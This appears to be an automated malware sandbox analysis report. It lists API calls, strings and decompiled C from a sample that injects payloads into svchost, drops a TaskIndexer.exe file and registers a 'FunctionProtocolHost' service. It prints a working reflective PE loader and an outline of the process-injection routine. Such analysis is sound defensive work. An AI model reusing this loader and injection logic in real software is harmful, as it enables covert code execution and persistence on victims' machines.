                                                control_flow_graph 323 3991630-3991676 call 399c970 CreateToolhelp32Snapshot 326 3991678-399168a call 3997eca 323->326 327 399168b-39916a5 Process32First 323->327 329 39916ab 327->329 330 39917c3-39917df CloseHandle call 3997eca 327->330 332 39916b0-39916dd call 399c970 OpenProcess 329->332 337 39917a9-39917b9 Process32Next 332->337 338 39916e3-39916fa K32GetModuleFileNameExA 332->338 337->330 341 39917bb-39917bd 337->341 339 3991700-3991709 338->339 340 39917a2-39917a3 CloseHandle 338->340 342 3991710-3991715 339->342 340->337 341->330 341->332 342->342 343 3991717-399171f 342->343 344 3991722-3991727 343->344 344->344 345 3991729-399172d 344->345 346 399179c 345->346 347 399172f-399175f call 399c970 call 39915d0 345->347 346->340 352 3991760-3991765 347->352 352->352 353 3991767-399176f 352->353 354 3991772-3991777 353->354 354->354 355 3991779-3991799 call 3991570 354->355 355->346
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03991666
                                                • Process32First.KERNEL32(00000000,?), ref: 0399169D
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 039916D3
                                                • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 039916F2
                                                • CloseHandle.KERNEL32(00000000), ref: 039917A3
                                                • Process32Next.KERNEL32(00000000,00000128), ref: 039917B1
                                                • CloseHandle.KERNEL32(00000000), ref: 039917C4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateFileFirstModuleNameNextOpenProcessSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 1963419105-0
                                                • Opcode ID: 0edaf6b30032f87105100780591b08e5448ae00d5f543be2ce02ae3bce6a2121
                                                • Instruction ID: 8cc81777d5284a28084c4e6a447d10983dacf21ab118f3f57a20184f666c97a4
                                                • Opcode Fuzzy Hash: 0edaf6b30032f87105100780591b08e5448ae00d5f543be2ce02ae3bce6a2121
                                                • Instruction Fuzzy Hash: 9741BA7590021A9BEF10DF68DC45BEAB77DFF85340F0841D5E90997181EA715A45CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997260 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 109memorythreadinjectionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,00000000,?,?), ref: 03997283
                                                  • Part of subcall function 039967D0: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039967E3
                                                  • Part of subcall function 039967D0: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 03996809
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399672B
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 03996749
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00005A4D,000000F8), ref: 0399675D
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 0399677E
                                                  • Part of subcall function 03996710: IsBadHugeReadPtr.KERNEL32(00000000,000000F8), ref: 039967A0
                                                • WriteProcessMemory.KERNELBASE(?,00000000,00000000,?,00000000), ref: 0399731D
                                                • ResumeThread.KERNELBASE(?), ref: 03997358
                                                Strings
                                                • Could not relocate the module!, xrefs: 039972DD
                                                • Redirecting failed!, xrefs: 0399733F
                                                • Could not allocate memory in the remote process, xrefs: 0399728F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$AllocMemoryProcessResumeThreadVirtualWrite
                                                • String ID: Could not allocate memory in the remote process$Could not relocate the module!$Redirecting failed!
                                                • API String ID: 1187666436-1687977203
                                                • Opcode ID: 41ab4c00a63c1b518c4dee2d72a517f9b64454cb86f8396a936566697486e3f1
                                                • Instruction ID: da2c0bf361a767898cbe0631536b4e530b4cfd67f11af7488dcdf348f2fd85a8
                                                • Opcode Fuzzy Hash: 41ab4c00a63c1b518c4dee2d72a517f9b64454cb86f8396a936566697486e3f1
                                                • Instruction Fuzzy Hash: BC31D679F102147BEF10EAEDAC41AFEB77DEB88651F1400A7F908A7241EE32591096A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD53DF0 Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E05
                                                • CryptImportKey.ADVAPI32(00000000,6FD69B90,00000094,00000000,00000000,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E2A
                                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E44
                                                • CryptHashData.ADVAPI32(00000000,?,?,00000000,?,?,?,?,?,?,?,73B76490), ref: 6FD53E59
                                                • CryptVerifySignatureW.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,73B76490), ref: 6FD53E76
                                                • CryptDestroyHash.ADVAPI32(?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD53E91
                                                • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD53EA1
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyImportReleaseSignatureVerify
                                                • String ID:
                                                • API String ID: 949692108-0
                                                • Opcode ID: a98c653c8afef73438f9594a89fd32c21763e875d3575403d3ecd9832326527f
                                                • Instruction ID: 87b4881cb6b39c5787af5937b33f956f2345c41b7d85196db6136fa895bbc514
                                                • Opcode Fuzzy Hash: a98c653c8afef73438f9594a89fd32c21763e875d3575403d3ecd9832326527f
                                                • Instruction Fuzzy Hash: FE210735B80309BBFF208FA0DD46FEA7BB9AB05B51F140155BA04E51D0D672BA34AA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54D40 Relevance: 6.2, APIs: 4, Instructions: 159memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E6FD54D40(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				long _v20;
				intOrPtr* _v24;
				void* _t58;
				struct HINSTANCE__* _t69;
				CHAR* _t70;
				_Unknown_base(*)()* _t71;
				intOrPtr* _t77;
				signed int _t78;
				unsigned int _t79;
				void* _t85;
				void* _t86;
				intOrPtr* _t89;
				struct HINSTANCE__* _t90;
				void* _t91;
				intOrPtr _t97;
				signed int _t98;
				void* _t100;
				void* _t101;
				signed short _t102;
				signed int _t104;
				intOrPtr* _t106;
				intOrPtr _t108;
				_Unknown_base(*)()** _t110;
				void* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed short* _t115;
				signed int _t118;
				intOrPtr _t119;
				signed short _t137;

				_t113 =  *((intOrPtr*)(__ecx + 4));
				_v24 = __ecx;
				_v16 = _t113;
				_t108 = _t113 + 4 +  *((intOrPtr*)(_t113 + 0x3c));
				_v12 = _t108;
				_t58 = VirtualAlloc(0,  *(_t108 + 0x4c), 0x3000, 0x40); // executed
				_t101 = _t58;
				_v8 = _t101;
				if(_t101 != 0) {
					_t85 = 0;
					if(0 >=  *((intOrPtr*)(_t108 + 2))) {
						L7:
						if( *((intOrPtr*)(_t108 + 0xa0)) == 0) {
							L18:
							if( *((intOrPtr*)(_t108 + 0x80)) == 0) {
								L33:
								_t86 = _v8;
								_v20 = 0;
								VirtualProtect(_t86,  *(_t108 + 0x4c), 0x40,  &_v20); // executed
								 *((intOrPtr*)( *((intOrPtr*)(_t108 + 0x24)) + _t86))(0, 1,  *_v24); // executed
								L34:
								return 0;
							}
							_t89 =  *((intOrPtr*)(_t108 + 0x7c)) + _t101;
							_v16 = _t89;
							if( *_t89 == 0) {
								goto L33;
							}
							while(1) {
								_t69 = LoadLibraryA( *((intOrPtr*)(_t89 + 0xc)) + _t101); // executed
								_v20 = _t69;
								if(_t69 == 0) {
									goto L34;
								}
								_t115 =  *_t89 + _v8;
								_t110 =  *((intOrPtr*)(_t89 + 0x10)) + _v8;
								_t102 =  *_t115;
								_t137 = _t102;
								if(_t137 == 0) {
									L31:
									_t89 = _t89 + 0x14;
									_v16 = _t89;
									if( *_t89 != 0) {
										_t101 = _v8;
										continue;
									}
									_t108 = _v12;
									goto L33;
								}
								_t90 = _t69;
								do {
									if(_t137 < 0 || 0 != 0) {
										_t70 = _t102 & 0x0000ffff;
									} else {
										_t70 = _v8 + 2 + _t102;
									}
									_t71 = GetProcAddress(_t90, _t70);
									_t115 =  &(_t115[2]);
									 *_t110 = _t71;
									_t110 = _t110 + 4;
									_t102 =  *_t115;
								} while (_t102 != 0);
								_t89 = _v16;
								goto L31;
							}
							goto L34;
						}
						_t77 =  *((intOrPtr*)(_t108 + 0x9c)) + _t101;
						_v16 = _t101 -  *((intOrPtr*)(_t108 + 0x30));
						_t97 =  *_t77;
						if(_t97 == 0) {
							goto L18;
						} else {
							goto L9;
						}
						do {
							L9:
							_t111 = _t97 + _t101;
							_t91 = _t77 + 8;
							_t118 =  *((intOrPtr*)(_t77 + 4)) - 8 >> 1;
							_t98 = 0;
							if(_t118 == 0) {
								goto L16;
							}
							do {
								_t78 =  *(_t91 + _t98 * 2) & 0x0000ffff;
								_t79 = _t78 >> 0xc;
								_t104 = _t78 & 0x00000fff;
								if(_t79 == 3 || _t79 == 0xa) {
									 *((intOrPtr*)(_t104 + _t111)) =  *((intOrPtr*)(_t104 + _t111)) + _v16;
								}
								_t98 = _t98 + 1;
							} while (_t98 < _t118);
							_t101 = _v8;
							L16:
							_t97 =  *((intOrPtr*)(_t91 + _t118 * 2));
							_t77 = _t91 + _t118 * 2;
						} while (_t97 != 0);
						_t108 = _v12;
						goto L18;
					}
					_t112 = _t108 + 0x108;
					do {
						_t100 =  *((intOrPtr*)(_t112 - 8)) + _t101;
						_t106 =  *_t112 + _t113;
						_t119 =  *((intOrPtr*)(_t112 - 4));
						if(_t119 == 0) {
							goto L5;
						} else {
							goto L4;
						}
						do {
							L4:
							_t100 = _t100 + 1;
							 *((char*)(_t100 - 1)) =  *_t106;
							_t106 = _t106 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
						L5:
						_t85 = _t85 + 1;
						_t101 = _v8;
						_t112 = _t112 + 0x28;
						_t113 = _v16;
					} while (_t85 < ( *(_v12 + 2) & 0x0000ffff));
					_t108 = _v12;
					goto L7;
				}
				return 0;
			}




































                                                0x6fd54d51
                                                0x6fd54d54
                                                0x6fd54d57
                                                0x6fd54d5d
                                                0x6fd54d60
                                                0x6fd54d68
                                                0x6fd54d6e
                                                0x6fd54d72
                                                0x6fd54d77
                                                0x6fd54d7e
                                                0x6fd54d84
                                                0x6fd54dc8
                                                0x6fd54dcf
                                                0x6fd54e34
                                                0x6fd54e3b
                                                0x6fd54ec1
                                                0x6fd54ec1
                                                0x6fd54ecd
                                                0x6fd54ed5
                                                0x6fd54ee9
                                                0x6fd54eeb
                                                0x00000000
                                                0x6fd54eed
                                                0x6fd54e44
                                                0x6fd54e46
                                                0x6fd54e4c
                                                0x00000000
                                                0x00000000
                                                0x6fd54e53
                                                0x6fd54e59
                                                0x6fd54e5f
                                                0x6fd54e64
                                                0x00000000
                                                0x00000000
                                                0x6fd54e6c
                                                0x6fd54e72
                                                0x6fd54e75
                                                0x6fd54e77
                                                0x6fd54e79
                                                0x6fd54eb3
                                                0x6fd54eb3
                                                0x6fd54eb6
                                                0x6fd54ebc
                                                0x6fd54e50
                                                0x00000000
                                                0x6fd54e50
                                                0x6fd54ebe
                                                0x00000000
                                                0x6fd54ebe
                                                0x6fd54e7b
                                                0x6fd54e7d
                                                0x6fd54e7d
                                                0x6fd54e97
                                                0x6fd54e8d
                                                0x6fd54e93
                                                0x6fd54e93
                                                0x6fd54e9c
                                                0x6fd54ea2
                                                0x6fd54ea5
                                                0x6fd54ea7
                                                0x6fd54eaa
                                                0x6fd54eac
                                                0x6fd54eb0
                                                0x00000000
                                                0x6fd54eb0
                                                0x00000000
                                                0x6fd54e53
                                                0x6fd54ddc
                                                0x6fd54dde
                                                0x6fd54de1
                                                0x6fd54de5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54de7
                                                0x6fd54de7
                                                0x6fd54dea
                                                0x6fd54df0
                                                0x6fd54df3
                                                0x6fd54df5
                                                0x6fd54dfa
                                                0x00000000
                                                0x00000000
                                                0x6fd54e00
                                                0x6fd54e00
                                                0x6fd54e06
                                                0x6fd54e09
                                                0x6fd54e12
                                                0x6fd54e1c
                                                0x6fd54e1c
                                                0x6fd54e1f
                                                0x6fd54e20
                                                0x6fd54e24
                                                0x6fd54e27
                                                0x6fd54e27
                                                0x6fd54e2a
                                                0x6fd54e2d
                                                0x6fd54e31
                                                0x00000000
                                                0x6fd54e31
                                                0x6fd54d86
                                                0x6fd54d90
                                                0x6fd54d93
                                                0x6fd54d97
                                                0x6fd54d99
                                                0x6fd54d9e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54da0
                                                0x6fd54da0
                                                0x6fd54da2
                                                0x6fd54da5
                                                0x6fd54da8
                                                0x6fd54dab
                                                0x6fd54dab
                                                0x6fd54db0
                                                0x6fd54db3
                                                0x6fd54db4
                                                0x6fd54db7
                                                0x6fd54dba
                                                0x6fd54dc1
                                                0x6fd54dc5
                                                0x00000000
                                                0x6fd54dc5
                                                0x6fd54ef3

                                                APIs
                                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6FD54D68
                                                • LoadLibraryA.KERNELBASE(?), ref: 6FD54E59
                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 6FD54E9C
                                                • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 6FD54ED5
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Virtual$AddressAllocLibraryLoadProcProtect
                                                • String ID:
                                                • API String ID: 1080606849-0
                                                • Opcode ID: 0dffd1b320fd8928b5acca36de38643d518b4fa1e32f542aa4c97c0ea9c1efeb
                                                • Instruction ID: 770b3bacabe01037051c136e618e56e76eb2241de666b5b8a4aead56a4d2cbce
                                                • Opcode Fuzzy Hash: 0dffd1b320fd8928b5acca36de38643d518b4fa1e32f542aa4c97c0ea9c1efeb
                                                • Instruction Fuzzy Hash: 78519975A00226DFDF44CF68C890BAAB7B2FF86304F1981A9D815AB245D731F930CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997780 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemInfo.KERNELBASE(?), ref: 0399779C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoSystem
                                                • String ID:
                                                • API String ID: 31276548-0
                                                • Opcode ID: e2792423c1df8ab9529ce6638c14185a49f41e46b7759cc589807ce8af0b2801
                                                • Instruction ID: 589ffe155e90cf01a4e120ad95016dffe34c2d2c4e1a9b5fec7e2e5ce15c6a34
                                                • Opcode Fuzzy Hash: e2792423c1df8ab9529ce6638c14185a49f41e46b7759cc589807ce8af0b2801
                                                • Instruction Fuzzy Hash: 24018B31B1914843DB08CAA8A9513BC73A8D78A311F0443EEFD0DE7B80ED268DA08385
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03991FB0 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 166sleepfilesynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • Sleep.KERNELBASE(00000BB8), ref: 03991FC4
                                                • LocalFree.KERNELBASE(?), ref: 03991FDD
                                                • LocalFree.KERNEL32(00000000), ref: 03992045
                                                • LocalFree.KERNEL32(?), ref: 0399204E
                                                • Sleep.KERNEL32(00002710), ref: 0399205C
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe), ref: 0399206B
                                                • CreateFileA.KERNEL32(C:\Windows\system32\TaskIndexer.exe,40000000,00000002,00000000,00000002,00000080,00000000), ref: 039920A4
                                                • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 039920BB
                                                • CloseHandle.KERNEL32(00000000), ref: 039920C6
                                                • DeleteFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe), ref: 039920F5
                                                • new.LIBCMT ref: 039920F9
                                                • Sleep.KERNEL32(00002710), ref: 03992121
                                                • CloseHandle.KERNEL32(00000000), ref: 0399212B
                                                  • Part of subcall function 03991440: CreateFileA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,C0000000,00000003,00000000,00000003,00000080,00000000,73B75870,00000000), ref: 0399146E
                                                  • Part of subcall function 03991440: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0399149D
                                                  • Part of subcall function 03991440: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 039914F2
                                                  • Part of subcall function 03991440: CloseHandle.KERNEL32(00000000), ref: 039914FC
                                                  • Part of subcall function 039913C0: new.LIBCMT ref: 039913DC
                                                  • Part of subcall function 039913C0: GetStartupInfoA.KERNEL32(?), ref: 039913FD
                                                  • Part of subcall function 039913C0: CreateProcessA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,00000000,00000000,00000000,00000000,00000040,00000000,00000000,00000044,00000000,?,?,?,?,73B75870,00000000), ref: 0399142D
                                                • GetTickCount.KERNEL32 ref: 03992164
                                                • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 03992176
                                                • GetTickCount.KERNEL32 ref: 03992183
                                                • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 03992199
                                                • GetTickCount.KERNEL32 ref: 039921A8
                                                • TerminateProcess.KERNELBASE(00000000,00000000), ref: 039921B2
                                                • TerminateThread.KERNELBASE(?,00000000), ref: 039921BD
                                                • Sleep.KERNELBASE(00002710), ref: 039921D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreateSleep$CloseCountFreeHandleLocalTick$DeleteObjectProcessSingleTerminateWait$DirectoryInfoStartupSystemThreadWrite
                                                • String ID: C:\Windows\system32\TaskIndexer.exe
                                                • API String ID: 3676629102-1369451346
                                                • Opcode ID: a489917974711c622b672b121059534808520e20ec7bec8d12fb7d25b0eeee0e
                                                • Instruction ID: b5006c859dae82829ae653865e7b2e6b7206ee58bc8460c5a087a5fc528eb938
                                                • Opcode Fuzzy Hash: a489917974711c622b672b121059534808520e20ec7bec8d12fb7d25b0eeee0e
                                                • Instruction Fuzzy Hash: C451C038904209FFEF10EFE9CD85FAEBBB5AF48344F148455E540AB286DB755A00DBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997370 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 177processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32 ref: 039973AD
                                                  • Part of subcall function 03996B20: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996B3A
                                                  • Part of subcall function 03996B20: IsBadHugeReadPtr.KERNEL32(-FC63E248,000000F8), ref: 03996B69
                                                  • Part of subcall function 03996B20: VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,039973C2,?,?,00000000,00000000), ref: 03996B8C
                                                • IsBadHugeReadPtr.KERNEL32(00000000,00000040), ref: 039973FF
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03997422
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03997436
                                                • ExpandEnvironmentStringsA.KERNEL32(%SystemRoot%\system32\svchost.exe,?,00000104), ref: 039974A2
                                                • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 039974ED
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0399750C
                                                Strings
                                                • Not supported paylad architecture!, xrefs: 039973D8
                                                • Creating target process failed!, xrefs: 039974F7
                                                • D, xrefs: 039974CE
                                                • Only 32 bit payloads can be injected from 32bit loader!, xrefs: 03997475
                                                • %SystemRoot%\system32\svchost.exe, xrefs: 0399749D
                                                • Could not allocate memory at the desired base!, xrefs: 039973CB
                                                • Incompatibile payload architecture!, xrefs: 03997468
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$Virtual$AllocCreateEnvironmentExpandFreeProcessStrings
                                                • String ID: %SystemRoot%\system32\svchost.exe$Could not allocate memory at the desired base!$Creating target process failed!$D$Incompatibile payload architecture!$Not supported paylad architecture!$Only 32 bit payloads can be injected from 32bit loader!
                                                • API String ID: 162425537-1639950610
                                                • Opcode ID: 65bb4c4407201389d8755b202e16f7ef5035bc7c8b51d6a47140e6d8d8b9f4c8
                                                • Instruction ID: 2f6bfd5dcc22f0476faaa3d15afa732db35bf2c08f23f4fcc5e5dd0ae97cc6c5
                                                • Opcode Fuzzy Hash: 65bb4c4407201389d8755b202e16f7ef5035bc7c8b51d6a47140e6d8d8b9f4c8
                                                • Instruction Fuzzy Hash: 69510B75744301ABFF20EBA8AC42BAE77ECEF89754F04055AFA449A181EF70A4058796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55670 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 87sleepregistrysynchronizationCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 92%
                                                			E6FD55670(void* __edi, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				struct _SERVICE_STATUS _v36;
				intOrPtr _v40;
				struct _SECURITY_ATTRIBUTES* _v44;
				struct _SECURITY_ATTRIBUTES* _v48;
				struct _SECURITY_ATTRIBUTES* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				struct _SERVICE_STATUS _v64;
				void* __esi;
				signed int _t20;
				int _t24;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t37;
				void* _t39;
				signed int _t43;

				_t20 =  *0x6fd68008; // 0xc92c5105
				_v8 = _t20 ^ _t43;
				_t41 = _a8;
				E6FD58E90("FunctionProtocolHost",  *_a8, 0x104);
				E6FD59235("FunctionProtocolHost",  *_a8, 0x104);
				_t24 = RegisterServiceCtrlHandlerA("FunctionProtocolHost", E6FD55840);
				 *0x6fd6b828 = _t24;
				if(_t24 != 0) {
					_push(__edi);
					FreeConsole();
					_v36 = 0x20;
					 *0x6fd6b824 = 2;
					_v32 = 2;
					_v28 = 5;
					_v24 = 0;
					_v20 = 0;
					_v16 = 1;
					_v12 = 0x3e8;
					SetServiceStatus( *0x6fd6b828,  &_v36); // executed
					_v64 = 0x20;
					 *0x6fd6b824 = 4;
					_v60 = 4;
					_v56 = 5;
					_v52 = 0;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x3e8;
					SetServiceStatus( *0x6fd6b828,  &_v64); // executed
					_t31 = E6FD55490(__edi); // executed
					 *0x6fd6b71c = _t31; // executed
					_t32 = CreateThread(0, 0, E6FD55430, "FunctionProtocolHost", 0, 0); // executed
					_t41 = Sleep;
					_t39 = _t32;
					do {
						Sleep(0x64);
						_t37 =  *0x6fd6b824; // 0x4
					} while (_t37 != 3 && _t37 != 1);
					WaitForSingleObject(_t39, 0xffffffff);
					CloseHandle(_t39);
					if( *0x6fd6b71c == 0x120) {
						L5:
						Sleep(0x2710);
						goto L5;
					}
				}
				return E6FD5599E(_v8 ^ _t43, _t41);
			}


























                                                0x6fd55676
                                                0x6fd5567d
                                                0x6fd55681
                                                0x6fd55690
                                                0x6fd556a1
                                                0x6fd556b3
                                                0x6fd556b9
                                                0x6fd556c0
                                                0x6fd556c6
                                                0x6fd556c7
                                                0x6fd556dd
                                                0x6fd556e4
                                                0x6fd556ee
                                                0x6fd556f5
                                                0x6fd556fc
                                                0x6fd55703
                                                0x6fd5570a
                                                0x6fd55711
                                                0x6fd55718
                                                0x6fd5571d
                                                0x6fd5572b
                                                0x6fd55735
                                                0x6fd5573c
                                                0x6fd55743
                                                0x6fd5574a
                                                0x6fd55751
                                                0x6fd55758
                                                0x6fd5575f
                                                0x6fd55761
                                                0x6fd55778
                                                0x6fd5577d
                                                0x6fd55783
                                                0x6fd55789
                                                0x6fd55790
                                                0x6fd55792
                                                0x6fd55794
                                                0x6fd5579a
                                                0x6fd557a7
                                                0x6fd557ae
                                                0x6fd557bf
                                                0x6fd557c1
                                                0x6fd557c6
                                                0x00000000
                                                0x6fd557c6
                                                0x6fd557bf
                                                0x6fd557d8

                                                APIs
                                                • _strncpy.LIBCMT ref: 6FD55690
                                                • __fassign.LIBCMT ref: 6FD556A1
                                                • RegisterServiceCtrlHandlerA.ADVAPI32(FunctionProtocolHost,6FD55840), ref: 6FD556B3
                                                • FreeConsole.KERNEL32 ref: 6FD556C7
                                                • SetServiceStatus.SECHOST(?), ref: 6FD55718
                                                • SetServiceStatus.ADVAPI32(?), ref: 6FD5575F
                                                  • Part of subcall function 6FD55490: _strncpy.LIBCMT ref: 6FD554CA
                                                  • Part of subcall function 6FD55490: RegOpenKeyA.ADVAPI32(80000002,?,00000000), ref: 6FD55519
                                                  • Part of subcall function 6FD55490: RegQueryValueExA.KERNELBASE(00000000,Type,00000000,?,00000000,?,?,?,73B009E0), ref: 6FD55555
                                                  • Part of subcall function 6FD55490: RegCloseKey.ADVAPI32(00000000,?,?,73B009E0), ref: 6FD55563
                                                  • Part of subcall function 6FD55490: SetLastError.KERNEL32(00000000,?,?,73B009E0), ref: 6FD55566
                                                  • Part of subcall function 6FD55490: RegCloseKey.KERNELBASE(00000000,?,?,73B009E0), ref: 6FD55572
                                                • CreateThread.KERNELBASE(00000000,00000000,6FD55430,FunctionProtocolHost,00000000,00000000), ref: 6FD5577D
                                                • Sleep.KERNELBASE(00000064), ref: 6FD55792
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6FD557A7
                                                • CloseHandle.KERNEL32(00000000), ref: 6FD557AE
                                                • Sleep.KERNEL32(00002710), ref: 6FD557C6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CloseService$SleepStatus_strncpy$ConsoleCreateCtrlErrorFreeHandleHandlerLastObjectOpenQueryRegisterSingleThreadValueWait__fassign
